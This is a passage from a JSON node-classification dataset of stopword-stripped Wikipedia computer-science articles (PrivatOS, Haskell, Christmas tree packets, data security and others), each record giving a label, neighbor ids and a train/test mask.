    "text": "PrivatOS:privatos privatos operating system used blackphone june 1 2014 june 30 2016 targeted users sought improved privacy security provided encryption phone calls emails texts internet browsing privatos modified version android forked android 4.4.2 came bundle security-minded tools however contrast android privatos open source company shipped privatos sgp technologies joint venture makers geeksphone silent circle concept encrypted phone long interest silent circle founder pgp creator phil zimmerman video blackphone website zimmerman said company stated operating system able “ close backdoors ” usually found major mobile operating systems major features privatos anonymous search privacy-enabled bundled apps smart disabling wi-fi except trusted hotspots control app permissions private communication calling texting video chat browsing file sharing conference calls geeksphone also claimed phone would receive frequent secure updates blackphone directly ars technica praised blackphone security center privatos gave control app permissions liked privatos came bundled silent phone silent text disconnect vpn disconnect search services ars like phone ’ performance mediocre using custom os meant google play benefits google ecosystem spotty support sideloaded apps reliance amazon third-party app stores month using device joshua drake accuvant concluded blackphone security claims overstated criticizing closed-source nature os lack os kernel hardening features praising fast patching added features",
    "neighbors": [
      8262,
      8283,
      5067,
      8940,
      9964,
      9646,
      7983,
      7483,
      5363,
      5397,
      8413,
      1083,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 3866,
    "label": 2,
    "text": "Spin-up:spin-up spin-up refers process hard disk drive optical disc drive accelerating platters inserted optical disc stopped state operational speed period time taken drive perform process referred spin-up time average reported hard disks s.m.a.r.t attribute required operational speed depends design disk drive typical speeds hard disks 2400 3600 4200 5400 7200 10000 15000 revolutions per minute rpm achieving speeds require significant portion available power budget computer system application power disks must carefully controlled operational speed optical disc drives may vary depending type disc mode operation see constant linear velocity spin-up hard disks generally occurs beginning computer boot process however modern computers ability stop drive machine already running means energy conservation noise reduction machine running requires access stopped drive delay incurred drive spun also depends type mechanism used within drive process spun needs energy input drive already spinning operation speeds since effort required electric motor accelerate platters opposed maintaining speed computers multiple hard drives method called staggered spin-up employed prevent excessive power-consumption spin-up may result power shortage power consumption spin-up often highest power draw different operating states hard disk drive staggered spin-up typically starts one drive time either waiting drive signal ready allowing predefined period time pass starting next drive power supply able supply sufficient current start multiple drives time common staggered spin-up ssu power-up standby puis different features help control spin-up multiple drives within computer system disk subsystem defined ata specifications standards see serial ata information one feature called power-up standby puis also called pm2 used serial ata sata parallel ata sometimes called pata ide hard disk drives puis requires bios and/or driver support use power applied hard disk drive drive spin-up puis spin-up command issued computer system bios raid controller must issue command tell drive spin-up accessed puis enabled tools hdparm drives support feature another feature called staggered spin-up ssu used serial ata sata hard disk drives common power-up standby puis require special commands get drive spin-up drive electronics waits sata data phy physical i/f activate spin-up drive computer system bios and/or raid controller raid driver set delay control different drives spin-up western digital hard disk drives pin 11 sata power interface controls whether staggered spin-up ssu enabled pin 11 also used activity led connection drive initially powered drive senses whether pin 11 left floating high 1 logic state grounded low 0 logic state ssu disabled pin 11 grounded disabled drive spin-up soon power applied ssu enabled pin 11 left floating driven high high 1 logic state drive spin-up sata phy interface becomes active connection sata controller sata raid controller sata sata raid controller control many drives spun-up ssu puis features configured software firmware manufacturer information fujitsu serial ata interface mobile hard disk drives whitepaper note staggered spin-up disks feature many multi-drive systems using sata raid typically used mobile platforms",
    "neighbors": [
      9137,
      1515,
      2811
    ],
    "mask": "None"
  },
  {
    "node_id": 3867,
    "label": 4,
    "text": "Timeline_of_computer_viruses_and_worms:timeline computer viruses worms timeline computer viruses worms presents chronological timeline noteworthy computer viruses computer worms trojan horses similar malware related research events",
    "neighbors": [
      3072,
      10756,
      10245,
      9227,
      9233,
      535,
      9242,
      9761,
      9256,
      9771,
      7217,
      2045,
      6707,
      5173,
      10297,
      3643,
      7739,
      8767,
      1088,
      9791,
      2114,
      4165,
      8789,
      11351,
      107,
      8301,
      3704,
      10875,
      5245,
      11390,
      2175,
      9855,
      6786,
      5764,
      9356,
      4245,
      10392,
      1690,
      156,
      9375,
      5281,
      6305,
      675,
      2213,
      7851,
      8387,
      7375,
      10448,
      4314,
      1245,
      3807,
      10477,
      9460,
      4344,
      3320,
      3323,
      4863,
      1279,
      3843,
      3852,
      8976,
      7441,
      8978,
      4883,
      278,
      11030,
      8474,
      8998,
      2857,
      300,
      311,
      1337,
      5435,
      11583,
      9537,
      3394,
      3395,
      11604,
      4439,
      858,
      7515,
      9569,
      3941,
      11621,
      877,
      5492,
      9591,
      6520,
      4475,
      4483,
      7044,
      1925,
      3462,
      9102,
      11152,
      10141,
      9630,
      1952,
      939,
      1970,
      4023,
      7098,
      1979,
      6588,
      9151,
      8640,
      9665,
      1474,
      8644,
      2508,
      11221,
      3032,
      8664,
      988,
      10208,
      9187,
      6129,
      2041,
      10747,
      3581
    ],
    "mask": "Test"
  },
  {
    "node_id": 3868,
    "label": 5,
    "text": "RVU_protocol:rvu protocol rvu protocol rvu pseudo-acronym pronounced r-view application layer protocol combines pre-existing digital living network alliance dlna standards new remote user interface rui protocol works similar remote desktop protocol rdp rvu rui protocol intended allow rvu-enabled client tv receive pixel-accurate display user interface available rvu server rvu combined dlna ability transmit media video photos music across home network allows entire user experience media server transmitted rvu client makes user interface available via rui protocol processing done server software plug-ins happen host computer user interface streamed client devices protocol primarily intended operate home network rvu protocol developed focus passing broadcast video coming multichannel video programming distributor residential gateway dedicated media server consumer electronic devices home however protocol much broader applications rvu protocol defined solve problem provide consistent television user interface throughout home without requiring use dedicated set-top box television rvu protocol communications protocol runs media server device multiple client devices rvu uses open standards including dlna upnp already use consumer electronics field clients consist various manufacturer-branded tvs blu-ray players client devices server generates user guide data sends client display way clients low complexity thin client devices still providing full user interface experience user rvu compliant device connected rvu server tv viewer watch different content room home viewers access prerecorded live content server via client device set-top box present user guide experience rvu supports networking existing home infrastructure agnostic transport mechanism work wireless technologies 802.11 wired technologies ethernet moca rvu supports remote user interface rui allows user interactions trick play e.g. pause rewind running interactive applications device render interface even though media center specific software plug-ins might installed however media files streamed different protocol render media extender needs implementation codec used package media locally installed client works extender codec host computer enough alternatively media trans-coded fly host computer codec supported client rvu protocol specification v1.0 released 3 december 2009 rvu protocol specification v1.0 currently ratified board available members implementation rvu protocol specification v2.0 became available january 7 2013 specification large part dependent dlna specification specification uses dtcp/ip link protection copyright-protected commercial content one device another rvu certification devices subject certification rvu alliance certification procedures development rvu alliance",
    "neighbors": [
      3441,
      10747
    ],
    "mask": "None"
  },
  {
    "node_id": 3869,
    "label": 9,
    "text": "Hy:hy hy alternately hylang programming language dialect language lisp designed interact language python translating expressions python abstract syntax tree ast hy introduced python conference pycon 2013 paul tagliamonte similar kawa clojure mapping s-expressions onto java virtual machine jvm hy meant operate transparent lisp front end python abstract syntax lisp allows operating code data metaprogramming thus hy used write domain-specific languages hy also allows python libraries including standard library imported accessed alongside hy code compiling step converting data structure python ast language documentation",
    "neighbors": [
      10752,
      11269,
      2056,
      2062,
      9231,
      7184,
      2577,
      9749,
      8728,
      4633,
      4122,
      8226,
      3119,
      2105,
      3132,
      6717,
      8258,
      8771,
      8262,
      1613,
      9299,
      10841,
      3675,
      7267,
      2660,
      8293,
      2666,
      5751,
      7805,
      9345,
      1159,
      9865,
      9877,
      5803,
      2225,
      6840,
      7867,
      4799,
      9926,
      7880,
      8908,
      205,
      5837,
      5852,
      10463,
      7392,
      7904,
      11488,
      11495,
      5356,
      4846,
      5360,
      5361,
      5872,
      8435,
      2804,
      9969,
      9975,
      6906,
      2304,
      4865,
      4867,
      5380,
      3334,
      6919,
      3336,
      10510,
      1301,
      791,
      10012,
      2335,
      2849,
      7981,
      7983,
      2352,
      10547,
      311,
      6969,
      3408,
      6994,
      1365,
      2392,
      10083,
      6502,
      11625,
      8554,
      3446,
      10104,
      377,
      4992,
      7562,
      6556,
      6047,
      1952,
      4516,
      5031,
      1448,
      5033,
      9128,
      7616,
      5569,
      6594,
      4550,
      11218,
      11221,
      10712,
      3034,
      3051,
      5611,
      5612,
      7670,
      11255
    ],
    "mask": "Train"
  },
  {
    "node_id": 3870,
    "label": 4,
    "text": "Dropsuite:dropsuite dropsuite limited formerly branded dropmysite global cloud software platform founded 2011 provides cloud backup archiving recovery solutions based singapore public company listed australian securities exchange asx dse originally dropsuite provided website backup services expanded services include cloud backup office 365 cloud backup g suite gmail email archiving additional solutions include gdpr responder ediscovery insights bi ransomware protection dropsuite began development name dropmysite september 2011 john fearon ’ business website needed backup solution ’ find service met needs fearon raised 300,000 first round funding singaporean television show called angel ’ gate 2012 created email backup service called dropmyemail october 31 2013 charif elansari took ceo 2014 smartphone backup service called dropmymobile launched dropmysite local offices us singapore japan india entered partnership xpress hosting web-hosting company mexico getting access 100,000 customers 500,000 domains dropmysite also announced partnerships gmo cloud paperboy japan october 3 2015 godaddy launched cloud backup service websites powered dropmysite 2016 company rebranded name dropsuite dec 29 2016 company went public australia securities exchange via backdoor listing 2017 dropsuite entered distribution agreement ingram micro october 22 2018 dropsuite entered cloud distribution partnership pax8 2019 dsd europe announced partnership dropsuite adding dropsuite ’ microsoft office 365 cloud backup email backup cloud backup services management team consists people different continents including asia africa north america australia dropsuite limited dse asx publicly listed company australian securities exchange originally dropmysite privately held technology startup received seed funding crystal horse investments stanley street labs angel investors backend dropmysite originally based amazon aws infrastructure dropsuite provides data backup support many country-locations americas europe asia africa utilizes amazon web services data center support ensure data remains within country borders needed user data stored online user agents download install dropsuite ’ cloud services protect user ’ information military grade 256-bit advanced encryption allow legal grade email archiving compatible microsoft office 365 g suite gmail hosted exchange open-xchange imap/pop email servers",
    "neighbors": [
      7248,
      11482,
      6367
    ],
    "mask": "Test"
  },
  {
    "node_id": 3871,
    "label": 2,
    "text": "Manual_memory_management:manual memory management computer science manual memory management refers usage manual instructions programmer identify deallocate unused objects garbage mid-1990s majority programming languages used industry supported manual memory management though garbage collection existed since 1959 introduced lisp today however languages garbage collection java increasingly popular languages objective-c swift provide similar functionality automatic reference counting main manually managed languages still widespread use today c c++ – see c dynamic memory allocation programming languages use manual techniques determine allocate new object free store c uses codice_1 function c++ java use codice_2 operator many languages python allocate objects free store determination object ought created object creation generally trivial unproblematic though techniques object pools mean object may created immediate use fundamental issue object destruction – determination object longer needed i.e garbage arranging underlying storage returned free store re-use manual memory allocation also specified manually programmer via functions codice_3 c codice_4 operator c++ – contrasts automatic destruction objects held automatic variables notably non-static local variables functions destroyed end scope c c++ manual memory management known enable several major classes bugs program used incorrectly notably violations memory safety memory leaks significant source security bugs languages exclusively use garbage collection known avoid last two classes defects memory leaks still occur bounded leaks frequently occur generational conservative garbage collection generally less severe memory leaks manual systems manual memory management one correctness advantage allows automatic resource management via resource acquisition initialization raii paradigm arises objects scarce system resources like graphics resources file handles database connections must relinquished object destroyed – lifetime resource ownership tied lifetime object languages manual management arrange acquiring resource object initialization constructor releasing object destruction destructor occurs precise time known resource acquisition initialization also used deterministic reference counting c++ ability put use automate memory deallocation within otherwise-manual framework use codice_5 template language standard library perform memory management common paradigm codice_5 suitable object usage patterns however approach usable garbage collected languages – notably tracing garbage collectors advanced reference counting – due finalization non-deterministic sometimes occurring difficult define determine finalizer method might called commonly known finalizer problem java gc 'd languages frequently use manual management scarce system resources besides memory via dispose pattern object manages resources expected implement codice_7 method releases resources marks object inactive programmers expected invoke codice_7 manually appropriate prevent leaking scarce graphics resources depending codice_9 method java implements finalizers release graphics resources widely viewed poor programming practice among java programmers similarly analogous codice_10 method python relied releasing resources stack resources resources acquired released within single block code automated various language constructs python codice_11 c codice_12 java codice_13-with-resources many advocates manual memory management argue affords superior performance compared automatic techniques garbage collection traditionally latency biggest advantage longer case manual allocation frequently superior locality reference manual allocation also known appropriate systems memory scarce resource due faster reclamation memory systems frequently thrash size program working set approaches size available memory unused objects garbage-collected system remain unreclaimed state longer manually managed systems immediately reclaimed increasing effective working set size manual management number documented performance disadvantages latency debated point changed time early garbage collectors simple implementations performing poorly compared manual memory management sophisticated modern garbage collectors often performing well better manual memory management manual allocation suffer long pause times occur simple stop-the-world garbage collection although modern garbage collectors collection cycles often noticeable manual memory management garbage collection suffer potentially unbounded deallocation times – manual memory management deallocating single object may require deallocating members recursively members members etc. garbage collection may long collection cycles especially issue real time systems unbounded collection cycles generally unacceptable real-time garbage collection possible pausing garbage collector real-time manual memory management requires avoiding large deallocations manually pausing deallocation",
    "neighbors": [
      2304,
      4747,
      5008,
      9490,
      11539,
      541,
      1954,
      5677,
      814,
      7983,
      1715,
      7091,
      3512,
      2625,
      1474,
      5059,
      8773,
      8262,
      1736,
      4424,
      6730,
      716,
      5325,
      6221,
      5840,
      5074,
      6868,
      9300,
      86,
      9559,
      5080,
      9432,
      10333,
      1247,
      8545,
      8573,
      6502,
      8551,
      2152,
      10470,
      7403,
      3577,
      634,
      7292,
      2045,
      7039
    ],
    "mask": "Test"
  },
  {
    "node_id": 3872,
    "label": 4,
    "text": "Christmas_tree_packet:christmas tree packet information technology christmas tree packet packet every single option set whatever protocol use term derives fanciful image little option bit header represented different-colored light bulb turned packet lit like christmas tree also known kamikaze packet nastygram lamp test segment christmas tree packets used method tcp/ip stack fingerprinting exposing underlying nature tcp/ip stack sending packets awaiting analyzing responses used part scanning system tcp header christmas tree packet flags fin urg psh set many operating systems implement compliance internet protocol standard rfc 791 varying incomplete ways observing host responds odd packet christmas tree packet inferences made regarding host operating system versions microsoft windows bsd/os hp-ux cisco ios mvs irix display behaviors differ rfc standard queried said packets large number christmas tree packets also used conduct dos attack exploiting fact christmas tree packets require much processing routers end-hosts usual packets christmas tree packets easily detected intrusion-detection systems advanced firewalls network security point view christmas tree packets always suspicious indicate high probability network reconnaissance activities",
    "neighbors": [
      5472,
      5506,
      5979,
      2409,
      939,
      6540,
      6797,
      7053,
      10924,
      1304,
      9146,
      5531,
      5245
    ],
    "mask": "Test"
  },
  {
    "node_id": 3873,
    "label": 2,
    "text": "Wheel_(computing):wheel computing computing term wheel refers user account wheel bit system setting provides additional special system privileges empower user execute restricted commands ordinary user accounts access term wheel first applied computer user privilege levels introduction tenex operating system later distributed name tops-20 1960s early 1970s term derived slang phrase big wheel referring person great power influence 1980s term imported unix culture due migration operating system developers users tenex/tops-20 unix modern unix systems generally use user groups security protocol control access privileges wheel group special user group used unix systems mostly bsd systems control access su sudo command allows user masquerade another user usually super user .. ubuntu creates group called codice_1 similar purpose wheel group phrase wheel war originated stanford university first documented 1983 version jargon file 'wheel war characterized part immature 'larval phase wherein students administrative privileges would attempt lock university multi-user see also multiseat computer system sometimes causing unintentional harm users",
    "neighbors": [
      7804,
      1379,
      7983,
      273,
      5492,
      11390,
      5179,
      700,
      9438,
      2399
    ],
    "mask": "None"
  },
  {
    "node_id": 3874,
    "label": 0,
    "text": "Chinese_speech_synthesis:chinese speech synthesis chinese speech synthesis application speech synthesis chinese language usually standard chinese poses additional difficulties due chinese characters frequently different pronunciations different contexts complex prosody essential convey meaning words sometimes difficulty obtaining agreement among native speakers concerning correct pronunciation certain phonemes recordings concatenated desired combination joins sound forced usual simple concatenation-based speech synthesis severely affect prosody synthesizers also inflexible terms speed expression however synthesizers rely corpus noticeable degradation performance given unusual awkward phrases ekho open source tts simply concatenates sampled syllables currently supports cantonese mandarin experimentally korean mandarin syllables pitched-normalised praat modified version used gradint synthesis partials cjkware.com used ship product called keytip putonghua reader worked similarly contained 120 megabytes sound recordings gsm-compressed 40 megabytes evaluation version comprising 10,000 multi-syllable dictionary words plus single-syllable recordings 6 different prosodies 4 tones neutral tone extra third-tone recording use end phrase lightweight open-source speech project espeak approach synthesis experimented mandarin cantonese espeak used google translate may 2010 december 2010 commercial product yuet also lightweight intended suitable resource-constrained environments like embedded systems written scratch ansi c starting 2013 yuet claims built-in nlp model require separate dictionary speech synthesised engine claims clear word boundaries emphasis appropriate words communication author required obtain copy espeak yuet synthesis speech cantonese mandarin input text output corresponding romanisation cantonese yuet uses yale espeak uses jyutping use pinyin mandarin espeak concern word boundaries n't change question syllable spoken corpus-based approach sound natural cases err dealing unusual phrases ca n't matched corpus synthesiser engine typically large hundreds even thousands megabytes due size corpus anhui ustc iflytek co. ltd iflytek published w3c paper adapted speech synthesis markup language produce mark-up language called chinese speech synthesis markup language cssml include additional markup clarify pronunciation characters add prosody information amount data involved disclosed iflytek seen commercial products iflytek licensed technology example bider speechplus 1.3 gigabyte download 1.2 gigabytes used highly compressed data single chinese voice iflytek synthesiser also synthesise mixed chinese english text voice e.g chinese sentences containing english words claim english synthesis average iflytek corpus appears heavily dependent chinese characters possible synthesize pinyin alone sometimes possible means cssml add pinyin characters disambiguate multiple possible pronunciations always work online interactive demonstration neospeech speech synthesis accepts chinese characters also pinyin enclosed proprietary vtml markup mac os chinese speech synthesizers available version 9 removed 10.0 reinstated 10.7 lion corpus-based approach taken tsinghua university sinosonic harbin dialect voice data taking 800 megabytes planned offered download link never activated nowadays references found internet archive bell labs approach demonstrated online 1997 subsequently removed described monograph multilingual text-to-speech synthesis bell labs approach springer october 31 1997 former employee responsible project chilin shih subsequently worked university illinois put notes methods website",
    "neighbors": [
      7780,
      3533,
      6838,
      9787,
      2428
    ],
    "mask": "Validation"
  },
  {
    "node_id": 3875,
    "label": 8,
    "text": "Msnbot:msnbot msnbot web-crawling robot type internet bot deployed microsoft collect documents web build searchable index msn search engine went beta 2004 full public release 2005 month october 2010 saw official retirement msnbot active web crawling duties replacement bingbot september 2015 msnbot still active microsoft bing webmaster help howto documentation still indicated msnbot active would retire soon verification tool bingbot previously recognise msnbot ip addresses test executed 2016-02-22 resulted yes verdict ip address 157.55.39.150 yes ip address verified bingbot ip address name msnbot-157-55-39-150.search.msn.com",
    "neighbors": [
      4356,
      11524,
      2566,
      6797,
      782,
      1935,
      2318,
      10900,
      11284,
      1913,
      2459,
      11549,
      3744,
      7970,
      1832,
      6827,
      944,
      3890,
      8757,
      4289,
      8769,
      9033,
      714,
      10957,
      4051,
      11221,
      11605,
      1240,
      11103,
      10338,
      617,
      8681,
      113,
      119,
      4473
    ],
    "mask": "Test"
  },
  {
    "node_id": 3876,
    "label": 9,
    "text": "Haskell_(programming_language):haskell programming language haskell statically typed purely functional programming language type inference lazy evaluation type classes enable type-safe operator overloading originated haskell main implementation glasgow haskell compiler named logician haskell curry haskell based semantics syntax miranda programming language served focus efforts initial haskell working group haskell used widely academia industry latest standard haskell haskell 2010. haskell committee working next standard haskell 2020 following release miranda research software ltd. 1985 interest lazy functional languages grew 1987 dozen non-strict purely functional programming languages existed miranda widely used proprietary software conference functional programming languages computer architecture fpca '87 portland oregon strong consensus committee formed define open standard languages committee purpose consolidate existing functional languages common one serve basis future research functional-language design first version haskell haskell 1.0 defined 1990 committee efforts resulted series language definitions 1.0 1.1 1.2 1.3 1.4 late 1997 series culminated haskell 98 intended specify stable minimal portable version language accompanying standard library teaching base future extensions committee expressly welcomed creating extensions variants haskell 98 via adding incorporating experimental features february 1999 haskell 98 language standard originally published haskell 98 report january 2003 revised version published haskell 98 language libraries revised report language continues evolve rapidly glasgow haskell compiler ghc implementation representing current de facto standard early 2006 process defining successor haskell 98 standard informally named haskell prime began intended ongoing incremental process revise language definition producing new revision per year first revision named haskell 2010 announced november 2009 published july 2010 haskell 2010 incremental update language mostly incorporating several well-used uncontroversial features previously enabled via compiler-specific flags haskell features lazy evaluation lambda expressions pattern matching list comprehension type classes type polymorphism purely functional language means functions generally side effects distinct construct exists represent side effects orthogonal type functions pure function return side effect subsequently executed modeling impure functions languages haskell strong static type system based hindley–milner type inference principal innovation area type classes originally conceived principled way add overloading language since finding many uses construct represents side effects example monad monads general framework model different kinds computation including error handling nondeterminism parsing software transactional memory monads defined ordinary datatypes haskell provides syntactic sugar use haskell open published specification multiple implementations exist main implementation glasgow haskell compiler ghc interpreter native-code compiler runs platforms ghc noted rich type system incorporating recent innovations generalized algebraic data types type families computer language benchmarks game also highlights high-performance implementation concurrency parallelism active growing community exists around language 5,400 third-party open-source libraries tools available online package repository hackage hello world program haskell last line strictly necessary factorial function haskell defined different ways integer type arbitrary-precision code compute values codice_10 456,574-digit number loss precision implementation algorithm similar quick sort lists first element taken pivot haskell logo top page generated haskell code listed implementations distributed open source licenses implementations fully nearly comply haskell 98 standard include implementations longer actively maintained include implementations fully haskell 98 compliant using variant haskell language include several web frameworks written haskell including jan-willem maessen 2002 simon peyton jones 2003 discussed problems associated lazy evaluation also acknowledging theoretical motives addition purely practical considerations improved performance note addition adding performance overhead lazy evaluation makes difficult programmers reason performance code particularly space use bastiaan heeren daan leijen arjan van ijzendoorn 2003 also observed stumbling blocks haskell learners subtle syntax sophisticated type system haskell double edged sword – highly appreciated experienced programmers also source frustration among beginners since generality haskell often leads cryptic error messages address researchers utrecht university developed advanced interpreter called helium improved user-friendliness error messages limiting generality haskell features particular removing support type classes ben lippmeier designed disciple strict-by-default lazy explicit annotation dialect haskell type-and-effect system address haskell difficulties reasoning lazy evaluation using traditional data structures mutable arrays argues p. 20 destructive update furnishes programmer two important powerful tools ... set efficient array-like data structures managing collections objects ... ability broadcast new value parts program minimal burden programmer robert harper one authors standard ml given reasons using haskell teach introductory programming among difficulty reasoning resource use non-strict evaluation lazy evaluation complicates definition data types inductive reasoning inferiority haskell old class system compared ml module system haskell build tool cabal historically criticised poorly handling multiple versions library problem know cabal hell stackage server stack build tool made response criticisms.. clean close slightly older relative haskell biggest deviation haskell use uniqueness types instead monads i/o side-effects series languages inspired haskell different type systems developed including java virtual machine jvm based related languages include haskell served testbed many new ideas language design many haskell variants produced exploring new language ideas including haskell community meets regularly research development activities main events since 2006 series organized hackathons occurred hac series aimed improving programming language tools libraries",
    "neighbors": [
      5635,
      4101,
      9224,
      9,
      12,
      2576,
      6160,
      8722,
      5651,
      1556,
      2069,
      7187,
      2585,
      3613,
      8221,
      9245,
      8738,
      8739,
      4134,
      3624,
      2603,
      5677,
      5168,
      2045,
      5680,
      5684,
      9780,
      2103,
      9783,
      10813,
      6718,
      64,
      8771,
      10819,
      8262,
      8775,
      10317,
      9808,
      3665,
      595,
      84,
      6228,
      3159,
      7256,
      9816,
      10841,
      7259,
      7262,
      10851,
      102,
      4200,
      7273,
      1130,
      7274,
      5743,
      7792,
      8303,
      8304,
      8815,
      2680,
      3705,
      2682,
      5754,
      7292,
      9848,
      9345,
      1666,
      2181,
      5255,
      1673,
      2186,
      6795,
      655,
      9871,
      9875,
      148,
      3733,
      3734,
      5783,
      10387,
      6810,
      155,
      10395,
      7326,
      4769,
      5796,
      9895,
      2217,
      4777,
      7851,
      9385,
      3245,
      1203,
      692,
      7347,
      8883,
      4791,
      9914,
      190,
      6335,
      7671,
      10435,
      5830,
      5833,
      6345,
      10953,
      10447,
      7889,
      1236,
      10964,
      4822,
      727,
      729,
      7386,
      219,
      7394,
      228,
      10470,
      1768,
      2281,
      3823,
      5872,
      10480,
      10991,
      2804,
      5885,
      7421,
      2304,
      11017,
      10506,
      11530,
      8973,
      10510,
      9491,
      1812,
      1813,
      6422,
      5399,
      6933,
      9497,
      5917,
      6941,
      10526,
      1313,
      4392,
      3370,
      8491,
      7983,
      10031,
      7987,
      1333,
      11574,
      823,
      10043,
      10555,
      7487,
      8000,
      10560,
      1347,
      1348,
      11259,
      1353,
      10571,
      8524,
      1358,
      847,
      9557,
      10581,
      2903,
      10584,
      10586,
      11610,
      348,
      6493,
      10083,
      8549,
      1382,
      6502,
      11625,
      8554,
      9579,
      1388,
      883,
      3960,
      8057,
      2938,
      11641,
      1920,
      6016,
      3462,
      4998,
      5510,
      6536,
      8582,
      1931,
      8587,
      9614,
      5521,
      8082,
      5527,
      11161,
      1435,
      1947,
      6555,
      10654,
      1952,
      7076,
      6566,
      5031,
      9128,
      5546,
      8618,
      428,
      4529,
      8116,
      6074,
      443,
      1982,
      9666,
      963,
      8644,
      4550,
      2505,
      7629,
      10703,
      5585,
      7634,
      11219,
      5588,
      11221,
      2519,
      4056,
      4057,
      10712,
      4572,
      477,
      4069,
      9192,
      7147,
      5612,
      7148,
      7662,
      9714,
      8691,
      5623,
      1016,
      1019,
      2557,
      11263
    ],
    "mask": "Test"
  },
  {
    "node_id": 3877,
    "label": 7,
    "text": "Apache_Oozie:apache oozie apache oozie server-based workflow scheduling system manage hadoop jobs workflows oozie defined collection control flow action nodes directed acyclic graph control flow nodes define beginning end workflow start end failure nodes well mechanism control workflow execution path decision fork join nodes action nodes mechanism workflow triggers execution computation/processing task oozie provides support different types actions including hadoop mapreduce hadoop distributed file system operations pig ssh email oozie also extended support additional types actions oozie workflows parameterised using variables codice_1 within workflow definition submitting workflow job values parameters must provided properly parameterized using different output directories several identical workflow jobs run concurrently oozie implemented java web application runs java servlet container distributed apache license 2.0",
    "neighbors": [
      3462,
      10377,
      8460,
      7567,
      1296,
      6161,
      1047,
      8217,
      11161,
      6555,
      8860,
      10661,
      11303,
      5677,
      1327,
      7983,
      4919,
      5047,
      4538,
      1851,
      6074,
      7485,
      7742,
      9789,
      7233,
      6338,
      4419,
      1222,
      1991,
      4294,
      7750,
      5066,
      8139,
      11343,
      3920,
      4944,
      1363,
      8408,
      9179,
      7261,
      990,
      8799,
      10719,
      865,
      11235,
      10341,
      8294,
      11111,
      8425,
      8810,
      747,
      5612,
      5872,
      2163,
      6774,
      7159,
      1913,
      1018
    ],
    "mask": "Train"
  },
  {
    "node_id": 3878,
    "label": 7,
    "text": "Remote_component_environment:remote component environment remote component environment rce integration environment scientists engineers analyze design simulate complex systems e.g. aircraft satellites space vehicle focusses collaboration multidisciplinary teams treating complex systems requires many experts several analysis design simulation tools rce tools integrated coupled workflows rce executes workflows fetches results involved tool servers rce extensible supports different scientific applications slightly different requirements rce built upon eclipse rich client platform rcp open source published eclipse public license epl development rce platform took place sesis project previously platform known reconfigurable computing environment since open sourced name changed remote component environment",
    "neighbors": [
      7149,
      5612,
      5677,
      7983
    ],
    "mask": "Train"
  },
  {
    "node_id": 3879,
    "label": 5,
    "text": "Back_to_My_Mac:back mac back mac feature introduced mac os x leopard 10.5 uses wide-area bonjour securely discover services across internet automatically configure ad hoc on-demand point-to-point encrypted connections computers using ipsec current version feature requires users icloud set well apple id due generality back mac work many bonjour-enabled services screen sharing similar apple remote desktop file sharing users must router supports either universal plug play upnp nat port mapping protocol nat-pmp either features enabled connected router uses udp port 4500 point-to-point ipsec connections may mapped different udp ports public side nat router october 12 2011 apple included back mac icloud service rather previously used mobileme thus making free use august 9 2018 apple updated support document note back mac would part macos mojave 10.14 release.the support document updated may 31 2019 indicate back mac services would discontinued versions macos july 1 2019 back mac used edit transfer files one mac another one instance apple store employee used technology capture image person stole macbook using built isight webcam",
    "neighbors": [
      576,
      4457,
      3371,
      6993,
      3670,
      11606,
      5784,
      3742
    ],
    "mask": "None"
  },
  {
    "node_id": 3880,
    "label": 4,
    "text": "Data_security:data security data security means protecting digital data database destructive forces unwanted actions unauthorized users cyberattack data breach disk encryption refers encryption technology encrypts data hard disk drive disk encryption typically takes form either software see disk encryption software hardware see disk encryption hardware disk encryption often referred on-the-fly encryption otfe transparent encryption software-based security solutions encrypt data protect theft however malicious program hacker could corrupt data order make unrecoverable making system unusable hardware-based security solutions prevent read write access data hence offer strong protection tampering unauthorized access hardware based security assisted computer security offers alternative software-only computer security security tokens using pkcs 11 may secure due physical access required order compromised access enabled token connected correct pin entered see two-factor authentication however dongles used anyone gain physical access newer technologies hardware-based security solves problem offering full proof security data working hardware-based security hardware device allows user log log set different privilege levels manual actions device uses biometric technology prevent malicious users logging logging changing privilege levels current state user device read controllers peripheral devices hard disks illegal access malicious user malicious program interrupted based current state user hard disk dvd controllers making illegal access data impossible hardware-based access control secure protection provided operating systems operating systems vulnerable malicious attacks viruses hackers data hard disks corrupted malicious access obtained hardware-based protection software manipulate user privilege levels impossible hacker malicious program gain access secure data protected hardware perform unauthorized privileged operations assumption broken hardware malicious contains backdoor hardware protects operating system image file system privileges tampered therefore completely secure system created using combination hardware-based security secure system administration policies backups used ensure data lost recovered another source considered essential keep backup data industries process recommended files importance user data masking structured data process obscuring masking specific data within database table cell ensure data security maintained sensitive information exposed unauthorized personnel may include masking data users example banking customer representatives see last 4 digits customers national identity number developers need real production data test new software releases able see sensitive financial data outsourcing vendors etc data erasure method software based overwriting completely destroys electronic data residing hard drive digital media ensure sensitive data lost asset retired reused uk data protection act used ensure personal data accessible concerns provides redress individuals inaccuracies particularly important ensure individuals treated fairly example credit checking purposes data protection act states individuals companies legitimate lawful reasons process personal information shared data privacy day international holiday started council europe occurs every january 28 since general data protection regulation gdpr european union eu became law may 25 2018 organizations may face significant penalties €20million 4 annual revenue comply regulation intended gdpr force organizations understand data privacy risks take appropriate measures reduce risk unauthorized disclosure consumers ’ private information international standards iso/iec 27001:2013 iso/iec 27002:2013 covers data security topic information security one cardinal principles stored information i.e data owned clear whose responsibility protect control access data following examples organizations help strengthen standardize computing security trusted computing group organization helps standardize computing security technologies payment card industry data security standard proprietary international information security standard organizations handle cardholder information major debit credit prepaid e-purse atm pos point sale cards general data protection regulation gdpr proposed european commission strengthen unify data protection individuals within european union eu whilst addressing export personal data outside eu",
    "neighbors": [
      2818,
      1161,
      522,
      1801,
      1930,
      141,
      5133,
      3599,
      9488,
      1169,
      3858,
      6929,
      9745,
      8085,
      10002,
      5404,
      672,
      3366,
      1961,
      9129,
      1324,
      2733,
      9260,
      9901,
      10801,
      1918,
      3382,
      6455,
      7739,
      3133,
      3262,
      11470,
      4689,
      4435,
      2901,
      598,
      1368,
      7515,
      4956,
      8668,
      4830,
      5217,
      1251,
      612,
      232,
      11368,
      4715,
      624,
      2416,
      7794,
      6131,
      500,
      3572,
      8052,
      5373,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 3881,
    "label": 2,
